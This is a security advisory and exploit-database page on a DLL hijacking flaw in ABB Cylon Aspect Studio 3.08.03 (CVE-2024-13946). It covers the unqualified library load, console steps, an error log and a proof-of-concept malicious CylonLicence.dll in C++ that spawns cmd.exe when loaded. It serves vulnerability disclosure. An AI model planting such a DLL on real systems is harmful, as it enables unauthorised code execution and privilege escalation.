## https://sploitus.com/exploit?id=ZSL-2025-5952
<html><body><p>ABB Cylon Aspect Studio 3.08.03 (CylonLicence.dll) Binary Planting
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: <=3.08.03
Summary: ABB Cylon ASPECT Studio is a graphical programming tool and
integrated development environment (IDE) for ABB Cylon ASPECT products.
It's used to engineer comprehensive area control and graphical user interface
(GUI) solutions, containing a library of logical and graphical widgets.
It allows users to monitor and control facilities from anywhere, providing
insights into building performance and enabling timely reactions to issues.
Desc: A DLL hijacking vulnerability exists in Aspect-Studio version 3.08.03,
where the application attempts to load a library named CylonLicence via
System.loadLibrary("CylonLicence") without a full path, falling back to the
standard library search order. If an attacker can plant a malicious CylonLicence.dll
in a writable directory that is searched before the legitimate library path,
this DLL will be loaded and executed with the privileges of the user running
the application. This flaw enables arbitrary code execution and can be exploited
for privilege escalation or persistence, especially in environments where the
application is executed by privileged users.
Tested on: Microsoft Windows 10 Home (EN)
OpenJDK 64-Bit Server VM Temurin-21.0.6+7
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2025-5952
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5952.php
CVE ID: CVE-2024-13946
CVE URL: https://www.cve.org/CVERecord/SearchResults?query=CVE-2024-13946
21.04.2024
--
C:\> type project
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
โโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโโ
C:\Aspect\Aspect-Studio-3.08.03> del CylonLicence.dll
C:\Aspect\Aspect-Studio-3.08.03> type aspect.bat
REM 64bit parameters
jre\bin\javaw -Dormlite.networkpoint.load=true -Dfile.encoding="UTF-8" -DlookAndFeel=nimbus -DMapGraphic.forceLoad=0 -DBACnet.discovery.driverPort=4224 -DBACnet.discovery.debugLevel=0 -Djava.library.path=. -DportPool.maxPortWaitTime=10000 -DOverride.enabled=false -Dlog4j.configuration=./log4j.aspectstudio.properties -Dswing.noxp=true -Dsun.java2d.d3d=false -Dsun.java2d.noddraw=true -XX:+UseG1GC -XX:MaxGCPauseMillis=200 -XX:InitiatingHeapOccupancyPercent=25 -Xss256k -Xms1024m -Xmx4096m -jar AspectStudioObf.jar
C:\Aspect\Aspect-Studio-3.08.03-a09>aspect.bat
C:\Aspect\Aspect-Studio-3.08.03-a09>REM 64bit parameters
C:\Aspect\Aspect-Studio-3.08.03-a09>jre\bin\javaw -Dormlite.networkpoint.load=true -Dfile.encoding="UTF-8" -DlookAndFeel=nimbus -DMapGraphic.forceLoad=0 -DBACnet.discovery.driverPort=4224 -DBACnet.discovery.debugLevel=0 -Djava.library.path=. -DportPool.maxPortWaitTime=10000 -DOverride.enabled=false -Dlog4j.configuration=./log4j.aspectstudio.properties -Dswing.noxp=true -Dsun.java2d.d3d=false -Dsun.java2d.noddraw=true -XX:+UseG1GC -XX:MaxGCPauseMillis=200 -XX:InitiatingHeapOccupancyPercent=25 -Xss256k -Xms1024m -Xmx4096m -jar AspectStudioObf.jar
C:\Aspect\Aspect-Studio-3.08.03> type AspectStudio.class
...
...
System.loadLibrary("CylonLicence");
} catch (Throwable t) {}
LoggerUtil.logger.error("Error loading license DLL", t);
}
}
...
...
C:\Aspect\Aspect-Studio-3.08.03> cd logs
C:\Aspect\Aspect-Studio-3.08.03\logs>type AspectStudio.log
ERROR: 2025-01-16 16:47:58,579 Error loading license DLL [main]
java.lang.UnsatisfiedLinkError: no CylonLicence in java.library.path
at java.lang.ClassLoader.loadLibrary(ClassLoader.java:1867)
at java.lang.Runtime.loadLibrary0(Runtime.java:870)
at java.lang.System.loadLibrary(System.java:1122)
at com.aamatrix.util.AspectStudio.<clinit>(AspectStudio.java:42)
at com.aamatrix.vib.rrobin.CylonLicense.<init>(CylonLicense.java:18)
at com.aamatrix.vib.rrobin.LicenseService.<init>(LicenseService.java:38)
at com.aamatrix.vib.rrobin.LicenseService.<clinit>(LicenseService.java:34)
at com.aamatrix.projectmanager.AspectStudio.<clinit>(AspectStudio.java:52)
at java.lang.Class.forName0(Native Method)
at java.lang.Class.forName(Class.java:348)
at com.aamatrix.projectmanager.AspectStudioLauncher.main(AspectStudioLauncher.java:70)
...
...
C:\DLL-Mala> type CylonLicence.cpp
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <shellapi.h>
extern "C" __declspec(dllexport)
DWORD WINAPI ExecuteCmdThread(LPVOID lpParam) {
ShellExecuteW(NULL, L"open", L"cmd.exe", L"/c start", NULL, SW_SHOWNORMAL);
return 0;
}
extern "C" __declspec(dllexport)
BOOL APIENTRY DllMain(HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved) {
switch (ul_reason_for_call) {
case DLL_PROCESS_ATTACH:
CreateThread(NULL, 0, ExecuteCmdThread, NULL, 0, NULL);
break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
</shellapi.h></windows.h></clinit></clinit></init></init></clinit></p></body></html>